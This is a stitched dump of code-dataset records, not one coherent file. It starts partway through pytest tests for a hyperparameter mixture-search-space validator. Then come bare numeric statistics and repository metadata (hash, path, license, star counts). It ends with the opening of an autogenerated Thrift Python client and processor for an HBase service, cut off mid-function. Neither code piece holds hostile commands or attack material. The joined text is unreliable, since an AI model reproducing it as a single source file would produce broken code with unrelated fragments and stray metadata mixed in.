             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    validate_mixture(space)
def test_mixture_search_space_bad():
    """A search space that is not a dict is rejected."""
    with pytest.raises(ValidationError):
        validate_mixture(["bma"])
def test_mixture_search_space_no_parameters():
    """A mixture without the mandatory "parameters" key is rejected."""
    # Only weights are supplied; the "parameters" list is deliberately absent.
    space = {"weights": [0.5, 0.5]}
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_bad_parameters():
    """"parameters" must be a list of dicts; a bare dict is rejected."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": {"category": "normal",
                       "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_missing_category():
    """Each parameter entry needs a "category"; a missing one is rejected."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": [
            # "category" key intentionally omitted here
            {"search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_bad_category():
    """An unknown parameter category is rejected."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": [
            {"category": "lol",  # not a recognized distribution name
             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_missing_search_space():
    """Each parameter entry needs a "search_space"; a missing one is rejected."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": [
            # "search_space" key intentionally omitted here
            {"category": "normal"},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_bad_search_space():
    """A "search_space" that is not a dict is rejected."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": [
            {"category": "normal", "search_space": ["lol"]},  # list, not dict
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_error_validation():
    """An inner search space that fails its own validation propagates the error."""
    space = {
        "weights": [0.5, 0.5],
        "parameters": [
            {"category": "normal",
             # low > high makes this inner normal space invalid
             "search_space": {"mu": 0.5, "sigma": 1, "low": 50, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_bad_weights():
    """"weights" must be a list; a scalar is rejected."""
    space = {
        "weights": 1,  # not a list
        "parameters": [
            {"category": "normal",
             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_bad_weights_size():
    """One weight for two parameters is a size mismatch and is rejected."""
    space = {
        "weights": [1],  # two parameters below, only one weight
        "parameters": [
            {"category": "normal",
             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_bad_weights_sum():
    """Weights that do not sum to 1 are rejected."""
    space = {
        "weights": [0.25, 0.25],  # sums to 0.5, not 1
        "parameters": [
            {"category": "normal",
             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ],
    }
    with pytest.raises(ValidationError):
        validate_mixture(space)
def test_mixture_search_space_no_weights():
    """When weights are omitted, validation fills them in and they sum to 1."""
    space = {
        "parameters": [
            {"category": "normal",
             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ]
    }
    result = validate_mixture(space)
    assert "weights" in result
    assert sum(result["weights"]) == 1
def test_validate_mixture_value():
    """validate_mixture_value accepts a value against a mixture search space."""
    space = {
        "parameters": [
            {"category": "normal",
             "search_space": {"mu": 0.5, "sigma": 1, "low": -5, "high": 5, "step": 0.1}},
            {"category": "categorical",
             "search_space": {"values": [1, 2, 3], "probabilities": [0.1, 0.2, 0.7]}},
        ]
    }
    # Smoke test: must not raise for this input
    validate_mixture_value("lol", **space)
| 28.701149
| 92
| 0.457749
| 724
| 7,491
| 4.520718
| 0.066298
| 0.278949
| 0.142988
| 0.079438
| 0.903147
| 0.895509
| 0.895509
| 0.895509
| 0.895509
| 0.895509
| 0
| 0.050053
| 0.375918
| 7,491
| 260
| 93
| 28.811538
| 0.650053
| 0.066079
| 0
| 0.544503
| 0
| 0
| 0.176952
| 0
| 0
| 0
| 0
| 0
| 0.010471
| 1
| 0.073298
| false
| 0
| 0.015707
| 0
| 0.089005
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
405a8de28620665eaaf041c61af7f70f220efde2
| 94,322
|
py
|
Python
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
|
CoderSong2015/Apache-Trafodion
|
889631aae9cdcd38fca92418d633f2dedc0be619
|
[
"Apache-2.0"
] | 148
|
2015-06-18T21:26:04.000Z
|
2017-12-25T01:47:01.000Z
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
|
CoderSong2015/Apache-Trafodion
|
889631aae9cdcd38fca92418d633f2dedc0be619
|
[
"Apache-2.0"
] | 1,352
|
2015-06-20T03:05:01.000Z
|
2017-12-25T14:13:18.000Z
|
core/sqf/src/seatrans/hbase-trx/src/main/python/thrift2/gen-py/hbase/THBaseService.py
|
CoderSong2015/Apache-Trafodion
|
889631aae9cdcd38fca92418d633f2dedc0be619
|
[
"Apache-2.0"
] | 166
|
2015-06-19T18:52:10.000Z
|
2017-12-27T06:19:32.000Z
|
#
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface:
  """Abstract interface for the THBaseService Thrift service.

  Autogenerated by the Thrift compiler (0.9.0) — do not edit by hand.
  Every method is a stub (`pass`); concrete behavior lives in the
  generated Client class and in server-side handlers implementing this
  interface.
  """
  def exists(self, table, get):
    """
    Test for the existence of columns in the table, as specified in the TGet.
    @return true if the specified TGet matches one or more keys, false if not
    Parameters:
     - table: the table to check on
     - get: the TGet to check for
    """
    pass

  def get(self, table, get):
    """
    Method for getting data from a row.
    If the row cannot be found an empty Result is returned.
    This can be checked by the empty field of the TResult
    @return the result
    Parameters:
     - table: the table to get from
     - get: the TGet to fetch
    """
    pass

  def getMultiple(self, table, gets):
    """
    Method for getting multiple rows.
    If a row cannot be found there will be a null
    value in the result list for that TGet at the
    same position.
    So the Results are in the same order as the TGets.
    Parameters:
     - table: the table to get from
     - gets: a list of TGets to fetch, the Result list
    will have the Results at corresponding positions
    or null if there was an error
    """
    pass

  def put(self, table, put):
    """
    Commit a TPut to a table.
    Parameters:
     - table: the table to put data in
     - put: the TPut to put
    """
    pass

  def checkAndPut(self, table, row, family, qualifier, value, put):
    """
    Atomically checks if a row/family/qualifier value matches the expected
    value. If it does, it adds the TPut.
    @return true if the new put was executed, false otherwise
    Parameters:
     - table: to check in and put to
     - row: row to check
     - family: column family to check
     - qualifier: column qualifier to check
     - value: the expected value, if not provided the
    check is for the non-existence of the
    column in question
     - put: the TPut to put if the check succeeds
    """
    pass

  def putMultiple(self, table, puts):
    """
    Commit a List of Puts to the table.
    Parameters:
     - table: the table to put data in
     - puts: a list of TPuts to commit
    """
    pass

  def deleteSingle(self, table, deleteSingle):
    """
    Deletes as specified by the TDelete.
    Note: "delete" is a reserved keyword and cannot be used in Thrift
    thus the inconsistent naming scheme from the other functions.
    Parameters:
     - table: the table to delete from
     - deleteSingle: the TDelete to delete
    """
    pass

  def deleteMultiple(self, table, deletes):
    """
    Bulk commit a List of TDeletes to the table.
    Throws a TIOError if any of the deletes fail.
    Always returns an empty list for backwards compatibility.
    Parameters:
     - table: the table to delete from
     - deletes: list of TDeletes to delete
    """
    pass

  def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
    """
    Atomically checks if a row/family/qualifier value matches the expected
    value. If it does, it adds the delete.
    @return true if the new delete was executed, false otherwise
    Parameters:
     - table: to check in and delete from
     - row: row to check
     - family: column family to check
     - qualifier: column qualifier to check
     - value: the expected value, if not provided the
    check is for the non-existence of the
    column in question
     - deleteSingle: the TDelete to execute if the check succeeds
    """
    pass

  def increment(self, table, increment):
    """
    Parameters:
     - table: the table to increment the value on
     - increment: the TIncrement to increment
    """
    pass

  def openScanner(self, table, scan):
    """
    Get a Scanner for the provided TScan object.
    @return Scanner Id to be used with other scanner procedures
    Parameters:
     - table: the table to get the Scanner for
     - scan: the scan object to get a Scanner for
    """
    pass

  def getScannerRows(self, scannerId, numRows):
    """
    Grabs multiple rows from a Scanner.
    @return Between zero and numRows TResults
    Parameters:
     - scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
     - numRows: number of rows to return
    """
    pass

  def closeScanner(self, scannerId):
    """
    Closes the scanner. Should be called if you need to close
    the Scanner before all results are read.
    Exhausted scanners are closed automatically.
    Parameters:
     - scannerId: the Id of the Scanner to close *
    """
    pass
class Client(Iface):
  """
  Synchronous Thrift client for THBaseService.

  Every public method foo(...) follows the same generated pattern:
    send_foo(...) writes a CALL message containing a foo_args struct to the
    output protocol and flushes the transport; recv_foo() then reads the
    reply, raising TApplicationException if the server answered with an
    EXCEPTION message, raising the declared service exception (TIOError /
    TIllegalArgument) if the result struct carries one, and otherwise
    returning result.success (void methods just return).  A
    TApplicationException(MISSING_RESULT) is raised when a non-void call
    yields neither a result nor an exception.

  NOTE(review): self._seqid is written into every message but never
  incremented, and recv_* does not compare rseqid against it — sequence
  ids are effectively unused on this synchronous client.
  """
  def __init__(self, iprot, oprot=None):
    # With a single protocol argument the same protocol is used for both
    # directions; pass oprot to split input/output transports.
    self._iprot = self._oprot = iprot
    if oprot is not None:
      self._oprot = oprot
    self._seqid = 0
  def exists(self, table, get):
    """
    Test for the existence of columns in the table, as specified in the TGet.
    @return true if the specified TGet matches one or more keys, false if not
    Parameters:
     - table: the table to check on
     - get: the TGet to check for
    """
    self.send_exists(table, get)
    return self.recv_exists()
  def send_exists(self, table, get):
    self._oprot.writeMessageBegin('exists', TMessageType.CALL, self._seqid)
    args = exists_args()
    args.table = table
    args.get = get
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_exists(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = exists_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "exists failed: unknown result");
  def get(self, table, get):
    """
    Method for getting data from a row.
    If the row cannot be found an empty Result is returned.
    This can be checked by the empty field of the TResult
    @return the result
    Parameters:
     - table: the table to get from
     - get: the TGet to fetch
    """
    self.send_get(table, get)
    return self.recv_get()
  def send_get(self, table, get):
    self._oprot.writeMessageBegin('get', TMessageType.CALL, self._seqid)
    args = get_args()
    args.table = table
    args.get = get
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_get(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = get_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "get failed: unknown result");
  def getMultiple(self, table, gets):
    """
    Method for getting multiple rows.
    If a row cannot be found there will be a null
    value in the result list for that TGet at the
    same position.
    So the Results are in the same order as the TGets.
    Parameters:
     - table: the table to get from
     - gets: a list of TGets to fetch, the Result list
    will have the Results at corresponding positions
    or null if there was an error
    """
    self.send_getMultiple(table, gets)
    return self.recv_getMultiple()
  def send_getMultiple(self, table, gets):
    self._oprot.writeMessageBegin('getMultiple', TMessageType.CALL, self._seqid)
    args = getMultiple_args()
    args.table = table
    args.gets = gets
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_getMultiple(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = getMultiple_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "getMultiple failed: unknown result");
  def put(self, table, put):
    """
    Commit a TPut to a table.
    Parameters:
     - table: the table to put data in
     - put: the TPut to put
    """
    self.send_put(table, put)
    self.recv_put()
  def send_put(self, table, put):
    self._oprot.writeMessageBegin('put', TMessageType.CALL, self._seqid)
    args = put_args()
    args.table = table
    args.put = put
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_put(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = put_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.io is not None:
      raise result.io
    # void method: a reply with no io exception means success
    return
  def checkAndPut(self, table, row, family, qualifier, value, put):
    """
    Atomically checks if a row/family/qualifier value matches the expected
    value. If it does, it adds the TPut.
    @return true if the new put was executed, false otherwise
    Parameters:
     - table: to check in and put to
     - row: row to check
     - family: column family to check
     - qualifier: column qualifier to check
     - value: the expected value, if not provided the
    check is for the non-existence of the
    column in question
     - put: the TPut to put if the check succeeds
    """
    self.send_checkAndPut(table, row, family, qualifier, value, put)
    return self.recv_checkAndPut()
  def send_checkAndPut(self, table, row, family, qualifier, value, put):
    self._oprot.writeMessageBegin('checkAndPut', TMessageType.CALL, self._seqid)
    args = checkAndPut_args()
    args.table = table
    args.row = row
    args.family = family
    args.qualifier = qualifier
    args.value = value
    args.put = put
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_checkAndPut(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = checkAndPut_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndPut failed: unknown result");
  def putMultiple(self, table, puts):
    """
    Commit a List of Puts to the table.
    Parameters:
     - table: the table to put data in
     - puts: a list of TPuts to commit
    """
    self.send_putMultiple(table, puts)
    self.recv_putMultiple()
  def send_putMultiple(self, table, puts):
    self._oprot.writeMessageBegin('putMultiple', TMessageType.CALL, self._seqid)
    args = putMultiple_args()
    args.table = table
    args.puts = puts
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_putMultiple(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = putMultiple_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.io is not None:
      raise result.io
    return
  def deleteSingle(self, table, deleteSingle):
    """
    Deletes as specified by the TDelete.
    Note: "delete" is a reserved keyword and cannot be used in Thrift
    thus the inconsistent naming scheme from the other functions.
    Parameters:
     - table: the table to delete from
     - deleteSingle: the TDelete to delete
    """
    self.send_deleteSingle(table, deleteSingle)
    self.recv_deleteSingle()
  def send_deleteSingle(self, table, deleteSingle):
    self._oprot.writeMessageBegin('deleteSingle', TMessageType.CALL, self._seqid)
    args = deleteSingle_args()
    args.table = table
    args.deleteSingle = deleteSingle
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_deleteSingle(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = deleteSingle_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.io is not None:
      raise result.io
    return
  def deleteMultiple(self, table, deletes):
    """
    Bulk commit a List of TDeletes to the table.
    Throws a TIOError if any of the deletes fail.
    Always returns an empty list for backwards compatibility.
    Parameters:
     - table: the table to delete from
     - deletes: list of TDeletes to delete
    """
    self.send_deleteMultiple(table, deletes)
    return self.recv_deleteMultiple()
  def send_deleteMultiple(self, table, deletes):
    self._oprot.writeMessageBegin('deleteMultiple', TMessageType.CALL, self._seqid)
    args = deleteMultiple_args()
    args.table = table
    args.deletes = deletes
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_deleteMultiple(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = deleteMultiple_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "deleteMultiple failed: unknown result");
  def checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
    """
    Atomically checks if a row/family/qualifier value matches the expected
    value. If it does, it adds the delete.
    @return true if the new delete was executed, false otherwise
    Parameters:
     - table: to check in and delete from
     - row: row to check
     - family: column family to check
     - qualifier: column qualifier to check
     - value: the expected value, if not provided the
    check is for the non-existence of the
    column in question
     - deleteSingle: the TDelete to execute if the check succeeds
    """
    self.send_checkAndDelete(table, row, family, qualifier, value, deleteSingle)
    return self.recv_checkAndDelete()
  def send_checkAndDelete(self, table, row, family, qualifier, value, deleteSingle):
    self._oprot.writeMessageBegin('checkAndDelete', TMessageType.CALL, self._seqid)
    args = checkAndDelete_args()
    args.table = table
    args.row = row
    args.family = family
    args.qualifier = qualifier
    args.value = value
    args.deleteSingle = deleteSingle
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_checkAndDelete(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = checkAndDelete_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "checkAndDelete failed: unknown result");
  def increment(self, table, increment):
    """
    Parameters:
     - table: the table to increment the value on
     - increment: the TIncrement to increment
    """
    self.send_increment(table, increment)
    return self.recv_increment()
  def send_increment(self, table, increment):
    self._oprot.writeMessageBegin('increment', TMessageType.CALL, self._seqid)
    args = increment_args()
    args.table = table
    args.increment = increment
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_increment(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = increment_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "increment failed: unknown result");
  def openScanner(self, table, scan):
    """
    Get a Scanner for the provided TScan object.
    @return Scanner Id to be used with other scanner procedures
    Parameters:
     - table: the table to get the Scanner for
     - scan: the scan object to get a Scanner for
    """
    self.send_openScanner(table, scan)
    return self.recv_openScanner()
  def send_openScanner(self, table, scan):
    self._oprot.writeMessageBegin('openScanner', TMessageType.CALL, self._seqid)
    args = openScanner_args()
    args.table = table
    args.scan = scan
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_openScanner(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = openScanner_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    raise TApplicationException(TApplicationException.MISSING_RESULT, "openScanner failed: unknown result");
  def getScannerRows(self, scannerId, numRows):
    """
    Grabs multiple rows from a Scanner.
    @return Between zero and numRows TResults
    Parameters:
     - scannerId: the Id of the Scanner to return rows from. This is an Id returned from the openScanner function.
     - numRows: number of rows to return
    """
    self.send_getScannerRows(scannerId, numRows)
    return self.recv_getScannerRows()
  def send_getScannerRows(self, scannerId, numRows):
    self._oprot.writeMessageBegin('getScannerRows', TMessageType.CALL, self._seqid)
    args = getScannerRows_args()
    args.scannerId = scannerId
    args.numRows = numRows
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_getScannerRows(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = getScannerRows_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.success is not None:
      return result.success
    if result.io is not None:
      raise result.io
    # scanner calls can also fail with TIllegalArgument (bad scanner id)
    if result.ia is not None:
      raise result.ia
    raise TApplicationException(TApplicationException.MISSING_RESULT, "getScannerRows failed: unknown result");
  def closeScanner(self, scannerId):
    """
    Closes the scanner. Should be called if you need to close
    the Scanner before all results are read.
    Exhausted scanners are closed automatically.
    Parameters:
     - scannerId: the Id of the Scanner to close *
    """
    self.send_closeScanner(scannerId)
    self.recv_closeScanner()
  def send_closeScanner(self, scannerId):
    self._oprot.writeMessageBegin('closeScanner', TMessageType.CALL, self._seqid)
    args = closeScanner_args()
    args.scannerId = scannerId
    args.write(self._oprot)
    self._oprot.writeMessageEnd()
    self._oprot.trans.flush()
  def recv_closeScanner(self, ):
    (fname, mtype, rseqid) = self._iprot.readMessageBegin()
    if mtype == TMessageType.EXCEPTION:
      x = TApplicationException()
      x.read(self._iprot)
      self._iprot.readMessageEnd()
      raise x
    result = closeScanner_result()
    result.read(self._iprot)
    self._iprot.readMessageEnd()
    if result.io is not None:
      raise result.io
    if result.ia is not None:
      raise result.ia
    return
class Processor(Iface, TProcessor):
  """
  Server-side dispatcher for THBaseService.

  __init__ builds a map from Thrift method name to the unbound
  process_<name> handler.  process() reads one incoming message,
  dispatches it through that map, and replies; unknown method names get
  a TApplicationException(UNKNOWN_METHOD) EXCEPTION reply.  Each
  process_* handler decodes the <name>_args struct, invokes the
  user-supplied handler object, captures declared service exceptions
  (TIOError, and TIllegalArgument for the scanner calls) into the
  <name>_result struct, and writes a REPLY message.

  NOTE(review): process() returns None on the unknown-method path but
  True after a successful dispatch — callers should not rely on its
  return value.
  """
  def __init__(self, handler):
    # handler: user object implementing the Iface methods
    self._handler = handler
    self._processMap = {}
    self._processMap["exists"] = Processor.process_exists
    self._processMap["get"] = Processor.process_get
    self._processMap["getMultiple"] = Processor.process_getMultiple
    self._processMap["put"] = Processor.process_put
    self._processMap["checkAndPut"] = Processor.process_checkAndPut
    self._processMap["putMultiple"] = Processor.process_putMultiple
    self._processMap["deleteSingle"] = Processor.process_deleteSingle
    self._processMap["deleteMultiple"] = Processor.process_deleteMultiple
    self._processMap["checkAndDelete"] = Processor.process_checkAndDelete
    self._processMap["increment"] = Processor.process_increment
    self._processMap["openScanner"] = Processor.process_openScanner
    self._processMap["getScannerRows"] = Processor.process_getScannerRows
    self._processMap["closeScanner"] = Processor.process_closeScanner
  def process(self, iprot, oprot):
    # NOTE: 'type' here shadows the builtin; kept as generated.
    (name, type, seqid) = iprot.readMessageBegin()
    if name not in self._processMap:
      # Unknown method: skip the args payload and answer with an EXCEPTION.
      iprot.skip(TType.STRUCT)
      iprot.readMessageEnd()
      x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
      oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
      x.write(oprot)
      oprot.writeMessageEnd()
      oprot.trans.flush()
      return
    else:
      self._processMap[name](self, seqid, iprot, oprot)
    return True
  def process_exists(self, seqid, iprot, oprot):
    args = exists_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = exists_result()
    try:
      result.success = self._handler.exists(args.table, args.get)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("exists", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_get(self, seqid, iprot, oprot):
    args = get_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = get_result()
    try:
      result.success = self._handler.get(args.table, args.get)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("get", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_getMultiple(self, seqid, iprot, oprot):
    args = getMultiple_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = getMultiple_result()
    try:
      result.success = self._handler.getMultiple(args.table, args.gets)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("getMultiple", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_put(self, seqid, iprot, oprot):
    args = put_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = put_result()
    try:
      # void method: no result.success to set
      self._handler.put(args.table, args.put)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("put", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_checkAndPut(self, seqid, iprot, oprot):
    args = checkAndPut_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = checkAndPut_result()
    try:
      result.success = self._handler.checkAndPut(args.table, args.row, args.family, args.qualifier, args.value, args.put)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("checkAndPut", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_putMultiple(self, seqid, iprot, oprot):
    args = putMultiple_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = putMultiple_result()
    try:
      self._handler.putMultiple(args.table, args.puts)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("putMultiple", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_deleteSingle(self, seqid, iprot, oprot):
    args = deleteSingle_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = deleteSingle_result()
    try:
      self._handler.deleteSingle(args.table, args.deleteSingle)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("deleteSingle", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_deleteMultiple(self, seqid, iprot, oprot):
    args = deleteMultiple_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = deleteMultiple_result()
    try:
      result.success = self._handler.deleteMultiple(args.table, args.deletes)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("deleteMultiple", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_checkAndDelete(self, seqid, iprot, oprot):
    args = checkAndDelete_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = checkAndDelete_result()
    try:
      result.success = self._handler.checkAndDelete(args.table, args.row, args.family, args.qualifier, args.value, args.deleteSingle)
    except TIOError as io:
      result.io = io
    oprot.writeMessageBegin("checkAndDelete", TMessageType.REPLY, seqid)
    result.write(oprot)
    oprot.writeMessageEnd()
    oprot.trans.flush()
  def process_increment(self, seqid, iprot, oprot):
    args = increment_args()
    args.read(iprot)
    iprot.readMessageEnd()
    result = increment_result()
    try:
      result.success = self._handler.increment(args.table, args.increment)
